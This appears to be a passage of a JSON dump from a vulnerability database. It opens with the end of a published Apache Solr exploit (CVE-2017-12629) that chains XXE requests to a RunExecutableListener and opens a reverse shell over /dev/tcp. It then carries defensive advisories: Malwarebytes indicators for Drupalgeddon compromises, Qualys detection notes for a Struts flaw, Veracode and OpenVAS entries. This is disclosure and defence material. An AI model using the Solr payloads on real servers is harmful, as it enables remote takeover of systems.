32%32%25%32%35%36%35%25%32%35%36%33%25%32%35%36%38%25%32%35%36%66%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%66%25%32%35%36%32%25%32%35%36%39%25%32%35%36%65%25%32%35%32%66%25%32%35%36%32%25%32%35%36%31%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%64%25%32%35%36%39%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%33%65%25%32%35%32%36%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%66%25%32%35%36%34%25%32%35%36%35%25%32%35%37%36%25%32%35%32%66%25%32%35%37%34%25%32%35%36%33%25%32%35%37%30%25%32%35%32%66%25%32%35%33%31%25%32%35%33%32%25%32%35%33%37%25%32%35%32%65%25%32%35%33%30%25%32%35%32%65%25%32%35%33%30%25%32%35%32%65%25%32%35%33%31%25%32%35%32%66%25%32%35%33%31%25%32%35%33%32%25%32%35%33%33%25%32%35%33%34%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%33%30%25%32%35%33%65%25%32%35%32%36%25%32%35%33%31%25%32%35%32%32%25%32%35%35%64%25%32%35%37%64%25%32%35%37%64%26%73%68%61%72%64%73%3d%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%22%3e%3c%61%3e%3c%2f%61%3e%27%7d\r\n \r\nWithout URL encode:\r\n \r\nhttp://localhost:8983/solr/newcollection/select?q={!xmlparser v='<!DOCTYPE a SYSTEM \"http://localhost:8983/solr/newcollection/select?q=xxx&qt=/solr/newcollection/config?stream.body={\"add-listener\":{\"event\":\"postCommit\",\"name\":\"newlistener\",\"class\":\"solr.RunExecutableListener\",\"exe\":\"sh\",\"dir\":\"/bin/\",\"args\":[\"-c\",\"[email\u00a0protected]|sh\",\".\",\"echo\",\"/bin/bash\",\"-i\",\">&\",\"/dev/tcp/127.0.0.1/1234\",\"0>&1\"]}}&shards=localhost:8983/\"><a></a>'}\r\n \r\nAs you may notice, in order to update the config we need to send a POST request to the application. But by using XXE vulnerability we can only send HTTP GET requests. There is a special trick is used here: If Solr receives \"/select?q=123&qt=/xxx&shards=localhost:8983/\" GET request, it actually converts it to POST and redirects this request to the shard specified in \"shards\" parameter. Which is also cool, it overwrites url query by the \"qt\" parameter, so we can convert it from \"/select\" to \"/config\". \r\nThe result HTTP request that is landed to localhost:8983/ will be POST request with stream.body=\"our_value\". That is exactly what we need in terms of exploitation.\r\n \r\nStep 3. Update \"newcollection\" through XXE to trigger execution of RunExecutableListener\r\n \r\nhttp://localhost:8983/solr/newcollection/select?q=%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%75%70%64%61%74%65%3f%73%74%72%65%61%6d%2e%62%6f%64%79%3d%25%35%62%25%37%62%25%32%32%25%36%39%25%36%34%25%32%32%25%33%61%25%32%32%25%34%31%25%34%31%25%34%31%25%32%32%25%37%64%25%35%64%26%63%6f%6d%6d%69%74%3d%74%72%75%65%26%6f%76%65%72%77%72%69%74%65%3d%74%72%75%65%22%3e%3c%61%3e%3c%2f%61%3e%27%7d%20\r\n \r\nWithout URL encode:\r\n \r\nhttp://localhost:8983/solr/newcollection/select?q={!xmlparser v='<!DOCTYPE a SYSTEM \"http://localhost:8983/solr/newcollection/update?stream.body=[{\"id\":\"AAA\"}]&commit=true&overwrite=true\"><a></a>'} \r\n \r\nStep 5. When the \"/bin/sh c [email\u00a0protected]|sh . echo /bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&1\" command is executed during update, a new shell session will be opened on the netcat listener. An attacker can execute any shell command on the server where Solr is running.\r\n \r\n \r\nIn all three requests Solr responds with different errors, but all of these error are happened after desired actions are executed.\r\n \r\nAll these vulnerabilities were tested on the latest version of Apache Solr with the default cloud config (bin/solr start -e cloud -noprompt)\r\n \r\nThese vulnerabilities were discovered by:\r\nMichael Stepankin (JPMorgan Chase)\r\nOlga Barinova (Gotham Digital Science)\n\n# 0day.today [2018-01-02] #", "sourceHref": "https://0day.today/exploit/28814", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "malwarebytes": [{"lastseen": "2018-06-05T16:04:05", "description": "Drupal is one of the most popular Content Management Systems (CMS), along with WordPress and Joomla. In late March 2018, Drupal was affected by a major remote code execution vulnerability ([CVE-2018-7600](<https://www.drupal.org/sa-core-2018-002>)) followed by yet another ([CVE-2018-7602](<https://www.drupal.org/sa-core-2018-004>)) almost a month later, both aptly nicknamed Drupalgeddon 2 and Drupalgeddon 3.\n\nThese back-to-back vulnerabilities were accompanied by proof of concepts that translated into almost immediate real-world attacks. For many website owners, this situation was frustrating because the window of time to patch is getting considerably smaller. Additionally, updating or upgrading Drupal (or any other CMS for that matter) may have side effects, such as broken templates or functionality, which is why you need to make a full back up and test the changes in the staging environment before moving to production.\n\nRolling out a CMS is usually the easy part. Maintaining it is where most problems occur due to lack of knowledge, fear of breaking something, and, of course, costs. While this is an earned responsibility for each site owner to do due diligence with their web properties, the outcome is typically websites being severely out of date and exploited, often more than once.\n\n### Sample set and web crawl\n\nWe decided to choose a number web properties that had not yet been validated (including all versions of Drupal, vulnerable or not). Our main source of URLs came from [Shodan](<https://www.shodan.io/>) and was complemented by [PublicWWW](<https://publicwww.com/>), for a total of roughly 80,000 URLs to crawl. We were surprised to start hitting compromised sites quickly into the process and were able to confirm around [900 injected web properties](<https://pastebin.com/GCWiSpa3>).\n\nMany of the results were servers hosted on Amazon or other cloud providers that were most likely set up for testing purposes (staging) and never removed or upgraded. Thankfully, they received little to no traffic. The other domains we encountered spanned a variety of verticals and languages, with one common denominator: an outdated version (usually severely outdated) of the Drupal CMS.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/Crawl.png> \"\" )\n\n_Figure 1: Crawling and flagging compromised Drupal sites using Fiddler_\n\n### Drupal versions\n\nAt the time of this writing, there are two [recommended releases](<https://www.drupal.org/project/drupal>) for Drupal. Version 8.x.x is the latest and greatest with some new features, while 7.x.x is considered the most stable and compatible version, especially when it comes to themes.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/releases_.png> \"\" )\n\n_Figure 2: Drupal's two main supported branches_\n\nAlmost half the sites we flagged as compromised were running Drupal version 7.5.x, while version 7.3.x still represented about 30 percent, a fairly high number considering it was last updated in [August 2015](<https://www.drupal.org/project/drupal/releases/7.39>). Many security flaws have been discovered (and exploited) since then.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/stats1.png> \"\" )\n\n_Figure 3: Percentage of compromised sites belonging to a particular Drupal version_\n\n### Payloads\n\nA large number of Drupal sites that have been hacked via these two recent exploits were also infected with server-side malware, in particular with [XMRig cryptocurrency miners](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>). However, in this post we will focus on the client-side effects of those compromises. Neither are exclusive though, and one should expect that a hacked site could be performing malicious actions on both server and client side.\n\nUnsurprisingly, web miners were by far the most common type of injection we noticed. But we also came across a few different social engineering campaigns.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/stats2.png> \"\" )\n\n_Figure 4: Breakdown of the most common payloads_\n\n#### Web miners\n\n[Drive-by mining attacks](<https://blog.malwarebytes.com/cybercrime/2017/11/a-look-into-the-global-drive-by-cryptocurrency-mining-phenomenon/>) went though the roof in the fall of 2017 but slowed down somewhat at the beginning of the year. It's safe to say that the recent Drupal vulnerabilities have added fuel to the fire and resulted in increased activity. Coinhive injections remain by far the most popular choice, although public or private Monero pools are gaining traction as well.\n\nWe are seeing the same campaign that was [already documented](<https://badpackets.net/large-cryptojacking-campaign-targeting-vulnerable-drupal-websites/>) by other researchers in early March and is ensnaring more victims by the day.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/coinhive_uni.png> \"\" )\n\n_Figure 5: A subdomain of Harvard University's main site mining Monero_\n\n#### Fake updates\n\nThis campaign of fake browser updates we [documented earlier](<https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/>) is still going strong. It distributes a password stealer of Remote Administration Tool (RAT).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/FakeUpdates.png> \"\" )\n\n_Figure 6: A compromised Drupal site pushing a fake Chrome update_\n\n#### Tech support scams (browlocks)\n\nRedirections to browser locker pages\u2014a typical approach for unveiling tech support scams. The most common redirection we were able to document involved an intermediary site redirecting to browser locker pages using the .TK Top Level Domain (TLD) name.\n \n \n mysimplename[.]com/si.php\n window.location.replace(\"http://hispaintinghad[.]tk/index/?1641501770611\");\n window.location.href = \"http://hispaintinghad[.]tk/index/?1641501770611\";\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/TSS_redirection.png> \"\" )\n\n_Figure 7: A compromised Drupal host redirecting to a browser locker page_\n\n### Web miners and injected code\n\nWe collected different types of code injection, from simple and clear text to long obfuscated blurbs. It\u2019s worth noting that in many cases the code is dynamic\u2014most likely a technique to evade detection.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/miner_injections.png> \"\" )\n\n_Figure 8: Collage of some of the most common miner injections_\n\n### Snapshots\n\nThe following are some examples of compromised sites sorted by category. We have contacted all affected parties to let them know their resources are being used by criminals to generate profit from malicious cryptomining or malware infections.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/uni1.png> \"\" )\n\n_Figure 9: Education (University of Southern California)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/gov1.png> \"\" )\n\n_Figure 10: Government (Arkansas Courts & Community Initiative)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/political.png> \"\" )\n\n_Figure 11: Political party (Green Party of California)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/reviveadserver.png> \"\" )\n\n_Figure 12: Ad server (Indian TV Revive Ad server)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/religious.png> \"\" )\n\n_Figure 13: Religion (New Holly Light)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/health_.png> \"\" )\n\n_Figure 14: Health (NetApp Benefits)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/conf.png> \"\" )\n\n_Figure 15: Conferences (Red Hat partner conference) _\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/tech.png> \"\" )\n\n_Figure 16: Tech (ComputerWorld's Brazilian portal)_\n\n### Malicious cryptomining remains hot\n\nIt is clear that right now, cryptomining is the preferred kind of malicious injection. There are many public but also private APIs that make the whole process easy, and unfortunately they are being abused by bad actors.\n\nCompromised sites big and small remain a hot commodity that attackers will try to amass over time. And because patching remains an issue, the number of potential new victims never stops growing. In light of this, website owners should look into other kinds of mitigation when patching is not always an immediate option, and check what some people call virtual patching. In particular, Web Application Firewalls (WAFs) have helped many stay protected even against new types of attacks, and even when their CMS was vulnerable.\n\n[Malwarebytes](<https://www.malwarebytes.com/>) continues to detect and block malicious cryptomining and other unwanted redirections.\n\n### Indicators of compromise\n\n**Coinhive**\n\n-> URIs\n \n \n cnhv[.]co/1nt9z\n coinhive[.]com/lib/coinhive.min.js\n coinhive[.]com/lib/cryptonight.wasm\n coinhive[.]com/lib/worker-asmjs.min.js?v7\n ws[0-9]{3}.coinhive[.]com/proxy\n\n-> Site keys\n \n \n CmGKP05v2VJbvj33wzTIayOv6YGLkUYN\n f0y6O5ddrXo1be4NGZubP1yHDaWqyflD\n kAdhxvdilslXbzLAEjFQDAZotIVm5Jkf\n MKr3Uf5CaT88pcqzAXltkBu4Us5gHWaj\n NL9TTsyGeVU8FbKR9fUvwkwU4qPJ4Z2I\n no2z8X4wsiouyTmA9xZ0TyUdegWBw2yK\n oHaQn8uDJ16fNhcTU7y832cv49PqEvOS\n PbNDLKIHLCM0hNXOIM7sRTsk66ZuAamf\n RYeWLxbPVlfPNsZUh231aLXoYAdPguXY\n XoWXAWvizTNnyia78qTIFfATRgcbJfGx\n YaUkuGZ3pmuPVsBMDxSgY45DwuBafGA3\n\n**Crypto-Loot**\n\n-> URI\n \n \n cryptaloot[.]pro/lib/justdoit2.js\n\n-> Keys\n \n \n 48427c995ba46a78b237c5f53e5fef90cd09b5f09e92\n 6508a11b897365897580ba68f93a5583cc3a15637212\n d1ba2c966c5f54d0da15e2d881b474a5091a91f7c702\n\n**EthPocket**\n \n \n eth-pocket[.]com:8585\n eth-pocket[.]de/perfekt/perfekt.js\n\n**JSECoin**\n \n \n jsecoin[.]com/platform/banner1.html?aff1564&utm_content=\n\n**DeepMiner**\n \n \n greenindex.dynamic-dns[.]net/jqueryeasyui.js\n\n**Other CryptoNight-based miner**\n \n \n cloudflane[.]com/lib/cryptonight.wasm\n\n**FakeUpdates**\n \n \n track.positiverefreshment[.]org/s_code.js?cid=220&v=24eca7c911f5e102e2ba\n click.clickanalytics208[.]com/s_code.js?cid=240&v=73a55f6de3dee2a751c3\n 185.244.149[.]74\n 5.9.242[.]74\n\n**Tech scams**\n \n \n 192.34.61[.]245\n 192.81.216[.]165\n 193.201.224[.]233\n 198.211.107[.]153\n 198.211.113[.]147\n 206.189.236[.]91\n 208.68.37[.]2\n addressedina[.]tk\n andtakinghis[.]tk\n andweepover[.]tk\n asheleaned[.]tk\n baserwq[.]tk\n blackivory[.]tk\n blownagainst[.]tk\n cutoplaswe[.]tk\n dearfytr[.]tk\n doanythingthat[.]tk\n faithlessflorizel[.]tk\n grey-plumaged[.]tk\n haddoneso[.]tk\n handkerchiefout[.]tk\n himinspectral[.]tk\n hispaintinghad[.]tk\n ifheisdead[.]tk\n itshandupon[.]tk\n iwouldsay[.]tk\n leadedpanes[.]tk\n millpond[.]tk\n mineofcourse[.]tk\n momentin[.]tk\n murdercould[.]tk\n mysimplename[.]com\n nearlythrew[.]tk\n nothinglikeit[.]tk\n oncecommitted[.]tk\n portraithedid[.]tk\n posingfor[.]tk\n secretsoflife[.]tk\n sendthemany[.]tk\n sputteredbeside[.]tk\n steppedforward[.]tk\n sweeppast[.]tk\n tellingmeyears[.]tk\n terriblehope[.]tk\n thatwonderful[.]tk\n theattractions[.]tk\n thereisnodisgrace[.]tk\n togetawayt[.]tk\n toseethem[.]tk\n wickedwere[.]tk\n withaforebodingu[.]tk\n\nThe post [A look into Drupalgeddon's client-side attacks](<https://blog.malwarebytes.com/threat-analysis/2018/05/look-drupalgeddon-client-side-attacks/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-18T15:00:00", "type": "malwarebytes", "title": "A look into Drupalgeddon\u2019s client-side attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-05-18T15:00:00", "id": "MALWAREBYTES:8AB104C08F6A4BE34498DA02C120E924", "href": "https://blog.malwarebytes.com/threat-analysis/2018/05/look-drupalgeddon-client-side-attacks/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "qualysblog": [{"lastseen": "2019-01-14T20:46:20", "description": "A new remote code execution [vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-057>) in Apache Struts 2, CVE-2018-11776, was [disclosed](<https://semmle.com/news/apache-struts-CVE-2018-11776>) yesterday. While this vulnerability does not exist with a default configuration of Struts, it does exist in commonly seen configurations for some Struts plugins.\n\n**Update August 24, 2018**: A [dashboard for this vulnerability](<https://community.qualys.com/docs/DOC-6515-dashboards-and-reporting-detecting-apache-struts-2-namespace-rce-cve-2018-11776>) is now available to download.\n\n### The Vulnerability\n\nStruts improperly validates namespaces, allowing for [OGNL](<https://en.wikipedia.org/wiki/OGNL>) injection, and can lead to full remote code execution on the target system. For a more detailed technical look at the vulnerability, please see our [Threat Protection blog](<https://threatprotect.qualys.com/2018/08/22/apache-struts-2-namespace-remote-code-execution-vulnerability-cve-2018-11776/>) on this topic. Struts versions 2.3.34 and 2.5.16 and before are impacted.\n\n### Recommended Response\n\nDue to the ease of exploitation and relatively common configuration that is required, this vulnerability should be patched immediately for all applications that use Struts 2. Patched versions are Struts [2.3.35](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.35>) and [2.5.17](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.17>). A publicly available [PoC](<https://github.com/jas502n/St2-057/blob/master/README.md>) has already been published, and active attacks against this vulnerability are most likely imminent.\n\n### Detections\n\nVulnerabilities in application frameworks are challenging to programmatically detect with traditional VM scanning, and multiple methods of detection are needed to ensure that Struts is found.\n\nBecause of this, Qualys has implemented two QIDs for detecting CVE-2018-11776 in [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>):\n\n * **QID 13251** - This detection includes both remote and authenticated checks: \n * **Remote** - This detection sends a specifically crafted payload in the request to check for command execution in .action, .go, .do, .jsp and .xhtml files under common web directories.\n * **Authenticated (Linux/Unix)** - This executes ps -ef command, looks for the presence of the Tomcat process and finds the location of struts2-core-x.jar file. We are investigating using this method on other middleware technologies.\n * **QID 371151** - This authenticated scan detection uses our Tomcat auth to specify the location of the Tomcat configuration file. Once a Tomcat auth record is added, this detection reads the Tomcat location from the config and searches for struts-core.x.jar file under sub directories. It extracts the version from .jar file and compares with vulnerable Struts versions.\n * Both QIDs are included in Vulnerability Signatures version **VULNSIGS-2.4.403-3** or later\n\nQualys has also implemented a QID for detecting CVE-2018-11776 in [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-application-scanning/>):\n\n * **QID 150250** - This is an active detection within WAS that sends a specially-crafted payload to the scanned web application. A vulnerable application will show evidence of a command executing on the server and QID 150250 will be reported.\n\nIn addition to scanning, Qualys recommends that application frameworks such as Struts be documented in an Application Portfolio or CMDB to ensure all components of an application are recorded and can be audited for these kinds of vulnerabilities.\n\n### Protection\n\nEven prior to the disclosure of this RCE vulnerability, [Qualys Web Application Firewall](<https://www.qualys.com/apps/web-app-firewall/>) users were already protected from exploits by every possible out-of-the-box template and generic policy. These templates, developed by security experts for Qualys WAF programmable inspection engine, are constantly tested against latests threats for the best detection rate and least false-positives.\n\n\n\nCustomers using manual policies instead of templates were potentially not protected though, depending on ELI (Expression Language Injection), CI (Code Injection) and RCE (Remote Command Execution) sliders settings, along with the blocking threshold.\n\n\n\n\n\nMitigating CVE-2018-11776 is possible by using the following methods:\n\n * native protection using a **generic policy** (QID-226017: Expression Language Injection and QID-226008: Remote Command Execution)\n * for those using a manual policy instead of an out-of-the-box template, you can alternatively create a **custom rule** with the following condition: _request.path DETECT \"qid/150178\"_\n * or of course, by applying a **virtual patch** to QID-150250 from within the WAS module ; which is equivalent to creating the rule manually, but quicker.\n\nToday\u2019s example - like \"drupalgeddon2\" a few months ago (CVE-2018-7600) - demonstrates how blocking zero-days is possible with Qualys WAF, without needing to define manual rules, giving CISO and IT Security organizations time for implementing sustainable fixes, while providing them with a tool to monitor and report any attempt to exploit the vulnerability.", "cvss3": {}, "published": "2018-08-23T20:27:19", "type": "qualysblog", "title": "Detecting Apache Struts 2 Namespace RCE: CVE-2018-11776", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-11776", "CVE-2018-7600"], "modified": "2018-08-23T20:27:19", "id": "QUALYSBLOG:22DFA98A7ED25A67B3D38EAAE5C82A9E", "href": "https://blog.qualys.com/securitylabs/2018/08/23/detecting-apache-struts-2-namespace-rce-cve-2018-11776", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "veracode": [{"lastseen": "2023-04-18T15:19:42", "description": "drupal is vulnerable to remote code execution (RCE) attacks. The library does not properly sanitize URL endpoints where array objects can be supplied to request parameters, allowing a potential compromise of the PHP application, and even the underlying operating system (OS). This vulnerability is related to CVE-2018-7600.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-26T10:18:46", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2019-10-10T03:41:43", "id": "VERACODE:6198", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-6198/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T13:07:35", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 3.11.59. See the following advisory for the container images for this release: https://access.redhat.com/errata/RHBA-2019:0023 Space precludes documenting all of the bug fixes and enhancements in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes: https://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_release_notes.html All OpenShift Container Platform 3.11 users are advised to upgrade to these updated packages and images.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-16T03:23:55", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000861"], "modified": "2022-06-13T20:21:27", "id": "VERACODE:19781", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-19781/summary", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-04-18T16:12:12", "description": "lucene-queryparser is vulnerable to remote code execution (RCE). This is possible through the use of an XML external entity expansion (XXE) attack and the Config API with add-listener command\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-16T00:44:41", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12629"], "modified": "2022-04-19T18:29:35", "id": "VERACODE:5281", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-5281/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T12:34:52", "description": "JMX-console is vulnerable to information disclosure. The JMX Console configuration only specified an authentication requirement for requests that used the GET and POST HTTP \"verbs\". A remote attacker could create an HTTP request that does not specify GET or POST, causing it to be executed by the default GET handler without authentication. This release contains a JMX Console with an updated configuration that no longer specifies the HTTP verbs. This means that the authentication requirement is applied to all requests.\n", "cvss3": {}, "published": "2020-04-10T00:42:53", "type": "veracode", "title": "Information Disclosure", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0738"], "modified": "2023-02-13T07:27:47", "id": "VERACODE:23989", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-23989/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-04-18T11:26:43", "description": "Sonatype nxrm is vulnerable to remote code execution. The vulnerability allows high privilege users such as administrators to run arbitrary code on the server (with Nexus process privileges) by injecting arbitrary Java Expression Language (EL) expressions.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-17T02:10:16", "type": "veracode", "title": "Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10199"], "modified": "2022-10-07T14:28:06", "id": "VERACODE:25043", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25043/summary", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:32:34", "description": "Drupal is prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310141029", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141029", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-004_win.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability 